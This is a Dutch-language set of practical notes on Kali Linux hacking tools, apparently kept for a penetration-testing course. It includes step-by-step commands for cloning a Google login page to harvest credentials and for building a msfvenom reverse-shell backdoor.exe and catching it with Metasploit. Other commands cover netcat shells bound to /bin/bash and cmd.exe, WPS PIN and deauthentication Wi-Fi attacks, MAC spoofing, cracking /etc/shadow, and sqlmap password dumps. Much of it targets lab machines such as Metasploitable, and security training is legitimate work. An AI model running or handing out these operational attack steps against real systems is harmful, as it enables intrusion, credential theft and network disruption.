Hacking Tools
recon-ng
Als Recon-NG
niet geinstalleerd is, voer dan dit uit:
apt-get update
apt-get install -y git
apt-get install -y python-pip python-dev build-essential
pip install --upgrade pip
pip install --upgrade virtualenv
git clone: https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
Nu recon-ng
gedownload is, gaan we het installeren:
cd recon-ng
pip install -r REQUIREMENTS
Dit gaat over versie 4.9.3.
show options
is hier ook een commando.
Om waardes te veranderen gebruik je set
, bv.
set timeout 1000
Discovering Modules
1 van de commando's is show modules
.
Er zijn meer dan 80 preconfigured modules.
Je kan bv. zeggen: use recon/domains-vulnerabilities
Of: use discovery/info_disclosure/cache_snoop
, en
dan set source URL
(je kan ook het IP address gebruiken).
Exploiting Modules
Je moet soms een nameserver opgeven, en soms een source.
Scan the site using a specific search engine, with our proper API keys
inserted, we can easily tell Recon-NG which search engine to use:
use google
Er zijn meerdere modules met 'google' erin, zoals
recon/domain_hosts/google_site_api
of
recon/domain_hosts/google_site_web
Social Engineering Toolkit
Met SET (Social Engineering Toolkit)
kan je mock emails in bulk verzenden, en site cloning en packet sniffing doen.
Start SET met setoolkit
Dit programma is interactief, en vraagt je steeds via cijfers een keuze te maken.
Voor de veiligheid altijd eerst 4
kiezen, om de
laatste updates te hebben.
Op trustedsec.com
kan je een ge-update versie van SET
ophalen.
Site cloning
Kies in SET eerst optie 1, dan
Website Attack Vectors
,
Credential Harvester
en dan
Site Cloner
Spear fishing
Je kiest 2 x 1 vanuit het hoofdmenu van SET, daarna heb je 3 opties, o.a. een Mass Email Attack. Hij kiest voor de optie Microsoft Windows Media Center vulnerability. Dan voor de Windows Reverse TCP Shell.
Voorbeeld (credentials harvesting)
Kies nr. 3 in het beginmenu, en dan voor 1
(Web Templates
).
Je moet vervolgens een IP-adres opgeven, bv. van je Kali machine.
Volgende stap is een template kiezen, bv. van Facebook of Twitter. Hier wordt Google gekozen. Als je naar die pagina toegaat, moet je inloggen met de credentials van je Google account. Als je inlogt, met wat voor gegevens dan ook, ga je naar de echte Google site. Op je Kali PC zie je de gebruikte credentials.
Virusscanners kunnen dit niet detecteren, omdat het een compleet legaal mechanisme is. Men bezoekt jouw server, tikt iets in, en wordt doorgestuurd naar Google.
Het moeilijkste probleem is: hoe krijg je gebruikers zo gek om naar de nieuwe website te gaan?!
Als iemand op hetzelfde netwerk zit kan je DNS spoofing gebruiken.
Op social networks zou je een shortened link naar je fake site kunnen zetten. Op bv.
xHydra
Je kan met deze tool de poort specificeren waarop je het password wilt kraken, dus o.a. bv. geschikt voor SSH (poort 22).
Ook kan je het protocol opgeven, bv. ssh of smb.
Ncrack
Deze tool wordt het meest voor remote desktop gebruikt, maar bv. http kan ook.
Als je ziet dat poort 3389 open staat, kan je met remote desktop (ook vanuit
Linux) verbinding maken:
rdesktop -u Administrator IP_address
ncrack -v -f --user administrator -P wordlist
rdp://IP_address,CL=1
('v'=verbose)
Cupp (wordlist generator)
Gebruik cupp
om allerlei feitjes over een gebruiker aan elkaar te koppelen.
Deze tool zit niet standaard in Kali:
apt-get install cupp
cupp -i
(interactive), en daarna worden je
vragen gesteld.
De resulterende file is niet supergroot maar wel effectief.
Kismet
Wireless hacking suite, bestaande uit scanner, packet sniffer en IDS.
Grafische tool, starten vanaf command line. Geeft overzicht van access points in de omgeving, en nog veel meer mogelijkheden.
Automatically start Kismet server?
beantwoorden met
Yes
.
Je kan console window sluiten.
Hij klaagt waarschijnlijk over dat er geen sources zijn, en je moet dus je interface naam invullen.
Als een client verbinding maakt met een hidden SSID laat
Kismet
automatisch de naam zien.
Na het beëindigen van het programma is er een bestand met de extensie
.nettxt
dat je met bv. Nano
kan bekijken.
wifijammer
Download Wifi Jammer
van
github.com
Je opent de file wifijammer.py
, en klikt dan op
Raw
.
Dan kopiëer je de URL.
Op de command line tik je
wget URL
Dan python wifijammer.py --help
python wifijammer.py --world -a AP_MAC_addr
wifi fisher
Tool is (11-2018) niet meer van Github te downloaden, maar anders
git clone URL
cd /wifiphiser
python setup.py install
Deze tool heeft 2 wireless interfaces nodig.
Als je die niet hebt --nojamming
optie aanzetten.
Gebruik pijltjes om het target AP te kiezen dat je wilt clonen, en geef
Enter
Daarna moet je nog een scenario kiezen.
Nr. 1 is bv. dat de client bij het verbinden een melding krijgt over
firmware upgrade, en zijn password moet intikken.
Als hij dat doet krijg jij het te zien, en krijgt hij een melding over
upgrade in progress.
Daarna kan je Ctrl+C
doen.
Wifi Pumpkin
Ook van Github (niet meer), maar na clone
-commando
./installer.sh --install
Na starten moet je IP-adres van router in Gateway
-veld
zetten.
Het SSID
moet hetzelfde zijn als dat van het
netwerk dat je wilt aanvallen, en dat geldt ook voor het kanaal.
Op het Pumpkin-Proxy
tabblad zijn een lading plugins
te zien.
Hier wordt de dnsspoof
plugin gebruikt als voorbeeld.
Achter domain_3
wordt de local server ingevuld.
Op het Home
tabblad kan je alle apparaten zien die
verbinding maken met je access point.
wifite
Automated wireless hacking tool, m.b.v. Python-script. Doet hetzelfde werk als de aircrack-ng suite, maar dan geautomatiseerd.
Help info met wifite --help
Met Ctrl+C
kan je het scanproces stoppen
of overschakelen op een andere kraakmethode.
Fern
Fern
is een graphical interface die o.a. gebruik
maakt van aircrack-ng
Tik in: fern-wifi-cracker
Eerst selecteer je je interface (bv. wlan0
),
dan start je een scan.
Je klikt op een WEP of WPA access point dat gevonden is, en dan op
Automate
.
Kies verder voor Regular attack
en
ARP Request Replay
.
Wat er achter de schermen gebeurt is achtereenvolgens:
aircrack-ng start wlan0
airodump-ng -c channel -w filename
-b BSSid_of_AP monitor_interface
aireplay-ng -1 0 -a MAC_addr mon_if
aireplay-ng -3 -b MAC_addr mon_if
aircrack-ng filename
Xplico
Deze tools is web-based, en heeft de Apache server nodig.
Dus eerst: service apache2 start
Op de webpagina van Xplico
staat dat je nu het
volgende moet doen:
/etc/init.d/xplico start
Met Ettercap
start je een sniffing sessie,
en op de pagina van Xplico
klik je op
New Case
.
Dan kies je voor Live acquisition
, en
klik je op Create
Dubbelklik op de nieuw aangemaakte case, en klik dan op
New session
, geef er een naam aan, en klik op
Create
Je moet nu nog de interface kiezen, en op Start
klikken.
Als je nu op de target machine een browsing sessie opent loop je kans op warnings, omdat de browser merkt dat er gesniffed wordt.
Na het stoppen van de sessie kan je links in het menu (bv. onder
Web
) zien welke sites bezocht zijn of plaatjes
bekeken, welke mails verstuurd zijn, etc.
Ettercap
Deze tool is alleen voor het onderscheppen van verkeer.
Een man-in-the-middle attack maakt gebruik van ARP poisoning. Daar kan je dit programma voor gebruiken.
Je volgt de volgende stappen:
echo 1 > /proc/sys/net/ipv4/ip_forward
In dit bestand moet alleen een 1 komen te staan.nano /etc/ettercap/etter.conf
- Zet in deze config
ec_uid
enec_gid
op 0. - Haal in deze config de hekjes weg
voor de 2 regels die over
iptables
gaan (in de sectie over Linux). ettercap -G
(G = GUI).
Kies in Ettercap
voor
Sniff - Unified sniffing
, en stel
je netwerk interface in (bv. eth0
).
Dan Hosts - Scan for hosts
Dan Mitm - ARP poisoning
en
Sniff remote connections
, gevolgd
door Start - Start sniffing
Nu maak je op je Windows machine met Putty
verbinding met de Metasploitable machine.
Dan zie je dat Ettercap
de credentials heeft
onderschept.
Hetzelfde zou ook lukken als je naar de web interface van Metasploitable
gaat.
Als je naar Connections
en het subvenster
Connection data
toe gaat, zie je bv. zelfs
de inhoud (HTML) van web pages.
Een manier om zo'n aanval te vermijden is dus het gebruik van encryptie.
Dit soort aanvallen kan ook in wireless netwerken worden uitgevoerd.
theharvester
Deze pagina op hackers-arise.com bevat veel info over deze tool.
theHarvester
is a command-line tool included in
Kali Linux that acts as a wrapper for a variety of search engines and is
used to find email accounts, subdomain names, virtual
hosts, open ports / banners, and employee names related to a domain from
different public sources (such as search engines and PGP key servers).
In recent versions, the authors added
the capability of doing DNS brute force, reverse IP resolution, and
Top-Level Domain (TLD) expansion.
Het verzamelen van emails over een target kan met
theHarvester
(-h
voor help info).
Opties:
-d
: Search through targets domain
-b
: Search through specific data source (e.g. Google)
-l
: Set limitations to search results
-h
: Use Shodan to help query discovered hosts
Doe: theHarvester -d microsoft.com -l 5000 -b all
(domain microsoft.com; -b all betekent dat je van alle zoekmogelijkheden,
zoals Google, gebruik maakt).
Je kan er zelfs een zoektocht met Shodan
aan
toevoegen:
theharvester -d microsoft.com -b all -h results
Problemen
Je kan theHarvester
overal in Kali aanroepen,
en je hoeft niet naar een speciale map (zoals in een hackingcursus gesuggereerd
werd), en ook niet theHarvester.py
aan te roepen
(al dan niet met Python).
Je moet wel denken aan de hoofdletter!!!
Met de -f filename
optie gaat de uitvoer naar
2 files: filename.html
en
filename.xml
.
Je hoeft niet zelf een extensie op te geven.
De 1e file kan je gewoon met Firefox
openen.
Ik krijg de foutmelding:
HTTPConnectionPool(host='www.google.com', port=80):
Max retries exceeded with url:
/search?num=100&start=0&hl=en&meta=&q=%40%22udemy.com%22
(Caused by NewConnectionError(': Failed to establish a new connection:
[Errno -3] Temporary failure in name resolution'))
local variable 'r' referenced before assignment
Maar een volgende keer werkt het ineens wel. Ik heb de indruk dat veel sites alleen te gebruiken zijn als je ergens credentials voor die site hebt staan of meegeeft.
Armitage
Dit is de grafische user interface voor
Metasploit
, en
geschikter voor beginners.
Er is een tutorial voor Armitage
Linksboven zie je de modules, onderverdeeld in 4 categorieën, en kan
je zoeken (probeer bv. smb
in te tikken).
Onder zie je het console window, waar ook de uitvoer verschijnt.
Rechtsboven is de workspace, waar je alle machines ziet waarmee je interactie
hebt.
Ook hier moet je eerst de database starten, met
service postgresql start
en
msfdb init
of
(en iemand heeft het ook nog over
service metasploit start
).
Als er desondanks problemen zijn met dit programma kan je het ook verwijderen
en weer installeren:
apt-get remove armitage
Daarna voeg je een host toe (bv. die van Metasploitable) (via
Hosts - Add host
).
Een range kan je opgeven bv. als
192.168.178.0/24
Je kan ook via het Hosts
-menu een
nmap
-scan doen.
Met rechtsklikken op een gevonden machine, kan je alle services zien die
op die machine lopen.
Na rechtsklikken op een machine kan je voor
Scan
kiezen.
Dan klik je op Attacks - Find attacks
Als een exploit succesvol was, komt er een bliksem door de computer.
Er is dan weer een menu bijgekomen als je rechtsklikt op de computer,
nl. Shell 1
, met o.a. de keuze
Interact
.
In het menu Attacks
kan je ook kiezen voor
Hail Mary
.
Dan worden alle exploits tegelijk benut, dus de kans op ontdekking
behoorlijk vergroot.
Voorbeeld waarbij je van tevoren al een exploit hebt gevonden
Zoek op een Microsoft exploit voor Server 2003, 03_026 (je kan ook op
beschrijving zoeken, bv. rpc dcom
).
Je dubbelklikt op de gevonden exploit, en vult (in dit geval) de remote host in.
Als je bevestigt, en de exploit wordt succesvol uitgevoerd, verschijnt de
aangevallen computer met een rood frame en een bliksem erdoor.
Je kan er dan rechts op klikken, dan
Meterpreter 1
Port scanning
In het zoekvenster kan je ook bv. port
intikken,
om bij de portscanning module uit te komen
(auxiliary - scanner - portscan - tcp
).
sqlmap
Dit is een open source tool om SQL injection kwetsbaarheden te detecteren en er gebruik van te maken.
Doe vanaf de command line
sqlmap -u URL --dbs
Vragen met yes beantwoorden.
Als je een lijst met database krijgt, kan je je richten op 1 ervan, met
sqlmap -u -D dbnaam --tables
Daarna vraag je kolommen op, met
sqlmap -u -D dbnaam -T tablename --columns
Als het niet lukt om binnen te komen kan je nog de switch
--level level
toevoegen, waarbij
level een waarde tussen 1 en 5 is.
Met 5 wordt er zo diep mogelijk gezocht.
Google dorking met SQLMap:
Je kan ook SQLMap
gebruiken:
sqlmap -g URL
(of IP address).
Extracting Passwords from Target Columns
Zoeken naar passwords:
sql -u URL --passwords
Dumping table entries
Als je alle table entries wilt dumpen kan je dit doen:
sql -u URL --dump
Finding Vulnerabilities with SQLMap
sqlmap --url
domain/wp-admin/profile.php?wp_http_referer=%2Fwp-admin%2Fusers.php
--level 5 --risk 3
Er komt dan een vraag over 'page comparison'.
Beantwoord die met continue
wash
wash -i interface
laat zien
welke versie van WPS access points gebruiken.
wash -i interface -C
is ook een mogelijkheid.
joomscan
joomscan -u URL
Installeren met apt-get install -y joomscan
Zie Joomscan – OWASP Joomla Vulnerability Scanner Project.
reaver
Dit programma maakt gebruik van de pincode (8 cijfers) van WPS om de
key van een access point (WPA(2)) te vinden.
Eerst kan je met wash
de WPS-enabled access points vinden.
(In mijn situatie zijn ze dat allemaal, alleen sommige WPS 1.0 en de meeste
WPS 2.0).
reaver -b AP_MAC_addr -c channel
-i interface
Evt. kan je -vv
toevoegen voor verbose output.
Soms word je door een router buitengesloten na een aantal foute
connectiepogingen, en in de help info van reaver
kan je bij de 'Advanced options' een aantal mogelijkheden vinden om dat
te omzeilen.
Je kan bv. een delay instellen tussen pin attempts.
Het kan 3 tot 10 uur duren voor er resultaten zijn.
msfvenom
Een Metasploit
tool om payloads en backdoors
te genereren.
msfvenom -a x86 - p windows/meterpreter/reverse_tcp
LHOST=IP_address LPORT=4444 -f exe -o /root/backdoor.exe
(a=archictecture, f=format, o=output file).
mv backdoor.exe /var/www/html
service apache2 start
service postgresql start
(listener)
msfconsole
use multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost IP_address
set lport 4444
run
Tik dan in het URL-veld van de browser:
IP_address/backdoor.exe
Download hem, en voer de file uit.
Je hebt dan een reverse Meterpreter
shell.
Je kan met help
meer info krijgen.
1 optie is het commando screenshot
.
sysinfo
is ook een nuttige.
Om te zien of de machine een virtuele is:
run post/windows/gather/checkvm
Om de shell meer stabiel te maken, kan je dit doen:
run post/windows/manage/migrate
Om een lijst van geïnstalleerde applicaties te krijgen:
run post/windows/gather/enum_applications
En een lijst van ingelogde gebruikers:
run post/windows/gather/enum_logged_on_users
Metasploit
Dit is een open source framework voor exploits.
Database
Voor je Metasploit
gaat gebruiken moet je de
db initialiseren, met
service postgresql start
of
msfdb init
of
/etc/init.d/postgresql start
Met msfdb stop
stop je de database.
Met msfdb -h
krijg je meer info.
Starten en stoppen
Met msfconsole
start je
Metasploit
.
Om het console te verlaten tik je
exit -y
Help info
?
geeft je een lijst met commando's.
Met help
krijg je help info.
show -h
geeft je extra info over het
show
-commando.
En je kan ook help command
doen.
Diversen
Met version
zie je de versie van
Metasploit
.
Om te zien wat de status van de database is, doe je
db status
Zoeken
Met search
kan je meer gericht zoeken, en met de
optie -h
krijg je help-informatie.
search value
zoekt naar modules/payloads.
Gebruiken exploit
info module_name
laat informatie zien.
check
laat zien of het doel kwetsbaar is voor een
module.
Met show options
laat opties zien
die je voor een module kan instellen.
Met set option_name value
verander
je de waarde van die optie in die waarde.
show payloads
laat de code zien die je na de
exploit moet uitvoeren.
use module_name
laadt een module om voor een
exploit te gebruiken.
Met exploit
wordt de exploit uitgevoerd.
Voorbeeld 1
Voer bv. de volgende commando's uit (die werken bv. voor de
Metasploitable machine):
search vsftp
Kopiëer de naam van de module (1e kolom) en doe
info module_name
use module_name
(autocomplete met Tab
werkt ook i.p.v. copy/paste)
show options
set rhost IP_address
show options
(let op verandering)
show payloads
check
(niet alle modules ondersteunen dat commando)
exploit -j
(background job)
sessions -l
(list)
sessions -i 1
(interact met sessie 1)
Vanaf hier kan je Unix commando's intikken, bv.
whoami
Aan het eind: exit
Voorbeeld 2
Zoek bv. naar de Server 2003 exploit MS03-026, met
search ms03-026
Dan tik je use name
, waarbij je de waarde
gebruikt die onder Name
staat.
Dan tik je: show options
, en je ziet dat er
een remote host (RHOST
) en een remote port
(RPORT
) nodig is.
De port is al ingevuld.
set RHOST IP_address
Tik exploit
, en je komt in een
meterpreter
-sessie.
Voorbeeld 3
Hij tikt zonder enige uitleg in:
use auxiliary/scanner/smb/smb_enumusers
(omdat hij weet dat de aan te vallen machine smb gebruikt).
Doe show options
.
Je ziet dat je alleen RHOSTS
en
THREADS
hoeft op te geven (omdat ze in hoofdletters
staan?).
set RHOSTS IP_address
run
levert weinig op.
Show anonymous logins
use auxiliary/scanner/ftp/anonymous
(je ziet anonymous users die met je FTP poort verbinden).
Je zet dan RHOSTS
op
192.168.1.0-255
, en
set threads 55
.
Daarna run
airmon-ng
Bedoeld om wireles adapter in monitor mode te zetten, en de status te bekijken.
In monitor mode zie je alle packets in de wifi-range van onze kaart.
Monitor mode zet je als volgt aan:
ifconfig wlan0 down
airmon-ng start wlan0
In Kali 2 verandert wlan0
in
wlan0mon
)
(In oudere versies heb je er een wireless card bijgekregen, nl.
mon0
).
Om monitor mode uit te zetten doe je
airmon-ng stop mon0
Problemen
Je krijgt de foutmelding:
Failed to set wlan0mon up using ip
,
al staat de kaart wel in monitor mode
(maar station mode disabled).
Oplossing: doe vooraf
airmon-ng check kill
(er worden dan een paar processen gekilled die in de weg zitten).
Met airmon-ng check
kan je zien welke processen
misschien in de weg zitten.
Airodump-ng
Hiermee zie je een overzicht van alle access points in de omgeving, of van 1 specifiek access point (evt. met aangekoppelde apparaten).
Tik in: airodump-ng interface
(interface kan mon0 of wlan0mon zijn).
Problemen
Je krijgt de fout
ioctl(SIOCSIFFLAGS) failed: Device or resource busy
Oplossing: Linux herstarten.
Je krijgt niets te zien.
Oplossing: Kijk met
rfkill
of het device geblocked is.
Beschrijving van de uitvoer
In de kolom PWR
(power) zie je hoe dichtbij een
access point is (minder negatief is dichterbij).
Onder BEACONS
zie je het aantal signalen dat van
dat access point komt ("hier ben ik").
Dit is "the number of captured ESSID broadcasts".
Onder #data
zie je het aantal nuttige pakketten
dat je gesniffed hebt (number of captured data packets).
Onder #/s
zie je het aantal datapakketten
dat je in de laatste 10 seconden gesniffed hebt.
Onder MB
zie je maximaal ondersteunde snelheid.
Onder ENC
zie de gebruikte encryptiemethode
(OPN/WEP/WPA/WPA2).
Onder CIPHER
zie je de gebruikte cipher
(WEP/WEP40/WEP104/TKIP/CCMP/WRAP).
Onder AUTH
zie je het type authenticatie dat nodig
is, bv. PSK
(pre-shared key) (of
SKA
of MGT
).
In de 2e helft van het scherm:
- BSSID: MAC-adres van het access point waarmee de client verbinding heeft;
- STATION: MAC-adres van de client;
- PWR: Sterkte van het signaal (des te hoger, des te sterker);
- Rate: Maximum haalbare data transfer snelheid van het station;
- Lost: #packets lost in de laatste 10 seconden;
- Packets: #data packets dat door de client verstuurd is
- Probes: naam van het netwerk waarmee de client verbinding probeert te maken.
Hidden SSID'
Je ziet ook hidden SSID's (broadcast mode off)
met airodump-ng
,
alleen zonder zijn naam.
Zodra je met bv. je mobiel verbinding maakt met die router, wordt zijn naam ineens wel zichtbaar.
1 access point monitoren
airodump-ng --channel chan --bssid MAC_addr
--write output_filename interface
Je hebt nu dezelfde sectie als eerst, met maar 1 regel, maar ook een nieuwe daaronder, met alle clients.
Na afloop zijn er 4 files aangemaakt.
De filenaam die je gespecificeerd hebt is slechts een prefix.
airodump-ng
plakt er een volgnummer achter, en
4 verschillende extensies: .cap
,
.csv
, .kismet.csv
en
.kismet.netxml
De .cap
-file kan je met
Wireshark
openen, maar veel spannends zal je
vanwege de encryptie niet zien.
aireplay-ng
aireplay-ng --deauth 4 -a Router_MAC_addr
-c Client_MAC_addr interface
zorgt ervoor dat de
verbinding van de client met de router wordt verbroken.
(4 is het aantal de-authentication packets.)
aireplay-ng --deauth nr_of_packets -a
Router_MAC interface
als je een deauthenticate wilt
doen voor alle clients.
aireplay-ng --deauth nr_of_packets -a
Router_MAC -c Target_MAC interface
als je een
deauthenticate wilt doen voor 1 specifieke client.
aircrack-ng
Dit programma combineert elk password in de wordlist met de naam van het AP, en berekent dan een Pairwise Master Key met het pbkdf2 algoritme. De key wordt dan vergeleken met de handshake file.
aircrack-ng handshake_file -w wordlist
airolib-ng
In de tijd dat je wacht tot een client verbinding maakt met het AP, kan je alvast de wordlist omzetten in een PMK lijst. Dat proces (berekenen van de PMK's) kost nl. de meeste tijd.
Er zijn 4 stappen.
Maak een database, en importeer de worlist:
airolib-ng db_name --import passwd dictionary
Vbd.: airolib-ng mydb --import passwd mylist
Importeer de target ESSID (router MAC address):
airolib-ng db_name --import essid essid_file
Vbd.: airolib-ng mydb --import essid essid-name
Bereken PMK's voor de wordlist:
airolib-ng db_name --batch
Vbd.: airolib-ng mydb --batch
Kraak de key m.b.v. de PMK-file:
airolib-ng -r db_name handshake_file
Vbd.: airolib-ng -r mydb Ziggo-router.cap
Macchanger
macchanger --help
voor help-informatie (vrij beperkt).
Voor de rest wijst de tool zichzelf.
Verbinding maken met AP als je MAC address geblokkeerd is
Zet je wlan0mon
interface down, met
ifconfig wlan0mon down
.
Dan macchanger -m MAC_addr interface
,
waarbij het
MAC address dat is van een apparaat dat al verbinding heeft met het access
point (kan je in de onderste helft van het airodum-ng
scherm zien).
Zet dan de interface weer up.
Netdiscover
Werkt alleen op local area networks, omdat het gebaseerd is op ARP.
Denk erom dat je de goede network interface gebruikt!
netdiscover -i eth0 -r 192.168.1.0/24
Op een netwerk met 192.168.56.x adressen werkt
netdiscover -r 192.168.56.0/8
om 1 of andere
reden niet, maar
netdiscover -r 192.168.56.0/16
wel.
Beebox
en Metasploitable
krijgen zoals verwacht IP-adressen 101 en 102 (uitgifte vanaf 100 geregeld
in VirtualBox
), maar Knoppix1 om duisteren redenen
110.
Discover
Command line tool met een menu van zo'n 12 items. Je kan o.a. zoeken op domains en personen. Maar ik heb van dat laatste nog geen resultaten gezien.
Zoek in Google op github en discover(.sh),
en kopieer de link die je dan krijgt
().
Doe op de cmdline in Kali:
git clone link
.
Er wordt dan een map discover
aangemaakt.
CeWL
Bouw een wordlist of dictionary gebaseerd op je eigen criteria (bv. tussen 5 en 10 tekens lang) en de inhoud van een website.
Cain and Abel
Windows tool voor password cracking en network sniffing. Gemakkelijk in gebruik.
Mimikatz
Probeert plaintext passwords, hashes, PIN codes and Kerberos tickets van een Windows-machine te halen.
Kan gebruikt worden voor pass-the-hash, pass-the-ticket en het aanmaken van Golden Tickets.
Patator
Multi-purpose brute force attack tool.
Medusa
Brute force password attack tool.
Deze tool is sneller dan Hydra en ondersteunt talloze remote authentication protocols (rlogin, ssh, telnet, http, etc.).
Hydra
Brute force network log on cracking tool. Probeert herhaaldelijk in een online systeem in te loggen.
Aanroepen zonder opties geeft help info.
Deze tool kan voor verschillende soorten authentication schemas gebruikt worden, zoals FTP, HTTP, etc.
hydra -l user -P password_list -v IP_address
ftp
hydra -L usernames -p Pass.txt IP_address ssh -t1
Vanzelfsprekend zijn dit soort attacks noisy.
Je kan het proces versnellen door meerdere threads te gebruiken, maar niet elk protocol laat dat toe.
Het is de kunst om bij een brute force attack een intelligente password list te gebruiken.
Crunch
Een tool om een wordlist mee te maken.
crunch min max
characters=character_list -t pattern
-o filename
(min is minimum aantal tekens).
Voorbeeld: crunch 6 8 123456!"&$% -o wordlist -t a@@@@b
Voorbeeld: om wachtwoord te genereren met de volgende structuur
Abc$#123
doe je
crunch 8 8 -t ,@@^^%%%
Je krijgt dan wel een file van meer dan 100 GB.
Met de -p
optie kan je er voor zorgen dat er geen
repeating characters in de passwords voorkomen.
De optie moet de laatste zijn.
FGDUMP
Deze tool draai je onder Windows, en geeft info over de users en passwords.
WCE (Windows Credentials Editor)
Op een 64-bit systeem moet je de 64-bit versie van deze tool gebruiken.
John the Ripper
Op een bestand met Windows hashes kan je ook John the Ripper
loslaten:
john filename
Dit kan wel heel lang duren.
Incremental mode
Standaard worden tussen 1 en 8 tekens geprobeerd.
Stel je hebt een password met alleen lowercase letter, dan doe je:
john -incremental=Alpha pw.txt
Als je alleen passwords hebt met lengte 5, dan voeg je een nieuwe mode toe aan de config file:
[Incremental:Alpha5]
File=$JOHN/lower.chr
MinLen=5
MaxLen=5
CharCount=26
Unshadow
Op een Linux zou je bv. dit kunnen proberen:
unshadow /etc/passwd /etc/shadow > password.txt
Daarna john password.txt
Ollydbg
Assembly level debugger for Windows.
Immunity debugger
Schrijven van exploits, analyzeren van malware en reverse engineer.
Ondersteunt Python APIs en execution.
Je kunt daardoor sneller werken dan met Ollydbg.
GNU debugger
Ondersteunt een hele lading programmeertalen, en draait op Linux/Unix.
Interactive DisAssembler (IDA)
Vertaalt executables naar assembly language. Ondersteunt executables van meerdere operating systems
hashcat
Zeer snelle password cracking tool, die ook van de GPU gebruik kan maken. Werkt op Windows en Linux.
hash-identifier
hash-identifier
kan je van de Kali site downloaden.
Je start de tool, en die vraagt dan om de hash.
De tool kan niet met zekerheid zeggen welk type hash het is.
Netcat
Status van een poort
Je kan controleren of een poort open is met
netcat -v IP-adres poortnummer
Serie open poorten controleren
nc -nvv -w 1 -z IP_address 20-30
Controleren op binnenkomende verbinding (listener opzetten)
Met netcat
kan je luisteren op poort
8080
:
netcat -v -l -p 8080
(de 'v' staat voor verbose,
de 'l' voor listen).
Je kan de opties ook combineren:
netcat -lvp 5555
(bv.).
Je kan de listener ook zo opzetten dat hij een command prompt start
als er een verbinding binnenkomt:
netcat -lvp 5555 -e /bin/bash
In dat geval kan je vanaf de besturende PC Linux commando's geven, zoals
bv. whoami
.
Stel je doet op de Windows machine
nc -vlp 4444 -e cmd.exe
en
onder Kali nc IP_adres_Windows 4444
dan krijg je een command prompt op de Windows machine vanuit je Kali machine.
Daarmee kan je dus remote administration doen.
Verbinding maken met andere PC
Op de andere machine kan je dan
nc IP_adres poort_nummer
intikken,
en dan wordt er een verbinding tot stand gebracht.
Tekst die je op de ene PC tikt wordt op de andere weergegeven, en omgekeerd.
Output naar een file sturen
Je kan ook file transfer doen met netcat.
Op de ene machine doe je dan bv.
nc IP_adres 4444 > test.txt
, en op de
andere nc -vlp 4444 < abc.txt
De filenamen op de 2 machines hoeven niet gelijk te zijn.
Drozer
Security audit and attack framework. Heeft tools om public Android exploits te gebruiken.
Android APK decompilation for the lazy
Python code die APK-file omzet naar Java source code.
APK Studio
Cross platform IDE om Android application binaries te reverse engineer en recompile.
hping
Command line TCP/IP packet assembler and analyzer. Kan TCP, UDP, ICMP en RAW-IP protocols gebruiken.
Met hping
kan je ook stealth mode scanning doen.
Je ziet dan o.a. open poorten, server name, flags, title, ID, etc.
Doe: hping3 URL -S
Je kan ook 1 poort scannen: hping3 URL --port 80 -S
Wireshark
Dit is een open source packet analyzer.
Je kan het programma hier downloaden.
En hier kan je meer over het programma leren.
Als je aan het experimenteren bent kan je beter 2 opties uitzetten.
Ga naar Capture - Options - Enable promiscuous mode
on all interfaces
, en haal het vinkje weg.
Anders wordt niet alleen het verkeer naar je Kali machine gemonitord,
maar al het verkeer over het netwerk.
Op het tabblad Options
staat het veld
Resolve MAC Adresses
.
Haal ook hier het vinkje weg.
Bij capturing met Wireshark
moet promiscuous mode
aan staan (Capture - Options
op het
Input
tabblad).
Op het Options
tabblad moet onder
Name resolution
een vinkje staan voor
Resolve MAC Addresses
.
WhatWeb
The WhatWeb tool is used to identify different web technologies used by the website. It identifies the different content management systems, statistic/analytics packages, and JavaScript libraries used to design the web application. The tool claims to have over 900 plugins. It can be run at different aggression levels that balance speed and reliability. The tool may get enough information on a single web page to identify the website, or it may recursively query the website to identify the technologies used.
WhatWeb - Next generation web scanner version 0.5.1.
Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles)
Homepage: https://www.morningstarsecurity.com/research/whatweb
Usage: whatweb [options]
Enter URLs, hostnames, IP addresses, filenames or
IP ranges in CIDR, x.x.x-x, or x.x.x.x-x.x.x.x
format.
--input-file=FILE, -i Read targets from a file.
--aggression, -a=LEVEL Set the aggression level. Default: 1.
1. Stealthy Makes one HTTP request per target and also
follows redirects.
3. Aggressive If a level 1 plugin is matched, additional
requests will be made.
--list-plugins, -l List all plugins.
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
Optionally search with a keyword.
--verbose, -v Verbose output includes plugin descriptions.
Note: This is the short usage help. For the complete usage help use -h or --help.
masscan
usage:
masscan -p80,8000-8100 10.0.0.0/8 --rate=10000
scan some web ports on 10.x.x.x at 10kpps
masscan --nmap
list those options that are compatible with nmap
masscan -p80 10.0.0.0/8 --banners -oB
save results of scan in binary format to
masscan --open --banners --readscan -oX
read binary scan results in and save them as xml in
Nmap
Bedoeld voor port scanning, zien welke ports open zijn en wat voor services er op draaien, en schatten welk operating system er draait.
De grafische versie is Zenmap
.
Als je een melding krijgt over dat eth0
niet werkt,
moet je even het commando nmap -iflist
uitvoeren.
In mijn geval moest ik eth2
gebruiken, en dat
doe je door extra optie -e eth2
mee te geven.
Help info
Je kan man nmap
gebruiken.
Config files
De configuratie van deze tool zit in
/usr/share/nmap
.
In de file nmap-services
zit een lijst van alle
poorten, met de services die er op draaien, en zelfs de waarschijnlijkheid
van het open zijn van die poort.
Diagnostische info
Met nmap -V
kan je de versie van
nmap
zien.
Gebruik bijna altijd de -v
optie (verbose output),
en evt. zelfs de -vv
optie (voor nog meer output).
Testen
Er is een site op het Internet die je mag scannen: scanme.nmap.org
Scripts
Zitten in /usr/share/nmap/scripts
Om voor een specifieke Cold Fusion vulnerability te scannen:
nmap -v -p 80 --script http-vuln-cve2010-2861
IP_address
Je kan ook alle scripts in 1 keer uitvoeren:
nmap -v -p 80 --script all
IP_address
Opties
Een paar veelgebruikte opties:
- -sA: Ack scan
Bepalen van open ports op firewalls. - -sn: Ping scan
Vinden van live hosts. Gaat snel. - -sP: Ping scan
Vinden van live hosts. - -sS: Syn scan
Alleen de syn flag staat aan, geen 3 way handshake (dus iets minder noisy). SYN - SYN/ACK - RST. Default scan, meest populair, kan 1000 poorten per seconde scannen. - -sT: TCP connect scan
3 way handshake. Meest betrouwbaar, maar noisy. - -sU: UDP scan
Er wordt een UDP-packet gestuurd. Als de poort open is reageert hij, als hij gesloten is of afgeschermd door een firewall niet. Dat verschil is dus niet te zien. - -sV: version detection mode
Je kan zien of de betreffende versie vulnerabilities heeft. - -sX: Xmas scan
